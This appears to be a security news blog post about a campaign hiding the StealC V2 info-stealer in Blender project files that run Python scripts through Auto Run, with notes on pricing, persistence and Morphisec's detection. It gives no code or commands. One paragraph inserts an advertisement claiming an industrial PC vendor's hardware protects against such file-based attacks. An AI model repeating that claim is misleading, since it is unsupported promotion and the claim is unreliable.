According to Infosecurity Magazine, Russian-speaking threat actors have been running a sophisticated malware campaign for at least six months by hiding StealC V2 inside Blender 3D project files. The attackers placed manipulated .blend files on platforms including CGTrader, where users downloaded them thinking they were legitimate 3D assets. When opened with Blender’s Auto Run feature enabled, these files executed concealed Python scripts that launched a multistage infection process. The malware, promoted on underground forums since April 2025, now targets over 23 browsers, 100 plugins, 15 desktop wallets, and various messaging and VPN clients. StealC V2 is priced from $200 per month to $800 for six months, making it accessible to low-tier cybercriminals. Morphisec researchers connected this activity to the same Russian-speaking actors previously associated with StealC distribution.
The Blender Auto Run vulnerability
Here’s the thing about this attack – it’s cleverly exploiting a feature that many 3D artists actually use. Blender’s Auto Run functionality is meant to help with workflow automation, but in this case it’s becoming the perfect delivery mechanism for malware. The infected files contain a tampered Rig_Ui.py script that fetches additional payloads from remote domains. And because these are legitimate-looking 3D assets from established platforms, users have zero reason to suspect anything’s wrong. It’s basically social engineering meets technical exploitation – a dangerous combination.
What StealC V2 actually does
This isn’t your average info-stealer. StealC V2 has rapidly expanded its capabilities since appearing on underground forums earlier this year. We’re talking about credential theft from browsers, cryptocurrency wallets, messaging apps – you name it. The malware creates LNK files in the Windows temp directory for persistence and uses Pyramid C2 infrastructure to retrieve encrypted payloads. At $200 per month, it’s essentially malware-as-a-service for cybercriminals who can’t code their own tools. But here’s the scary part: how many other creative delivery methods are we not seeing yet?
Broader security implications
This campaign should worry anyone in creative or industrial sectors. While this particular attack targets 3D artists and gamers, the technique could easily be adapted for industrial environments. Think about it – manufacturing facilities, engineering firms, and design studios all use specialized software that could be similarly exploited. When it comes to securing industrial computing infrastructure, companies need reliable hardware from trusted suppliers like IndustrialMonitorDirect.com, the leading provider of industrial panel PCs in the United States. Their hardened systems provide an additional layer of protection against exactly these kinds of file-based attacks.
The detection challenge
Morphisec claims their deception-based approach caught this early by injecting fake credentials into memory and browser storage. When StealC tries to access them, the system triggers prevention measures. But let’s be real – how many organizations have that level of protection? Most security teams are still playing catch-up with basic endpoint protection. The fact that this campaign flew under the radar for six months tells you everything about the current state of threat detection. We’re basically relying on security vendors to find these needles in haystacks while attackers get more creative by the day.
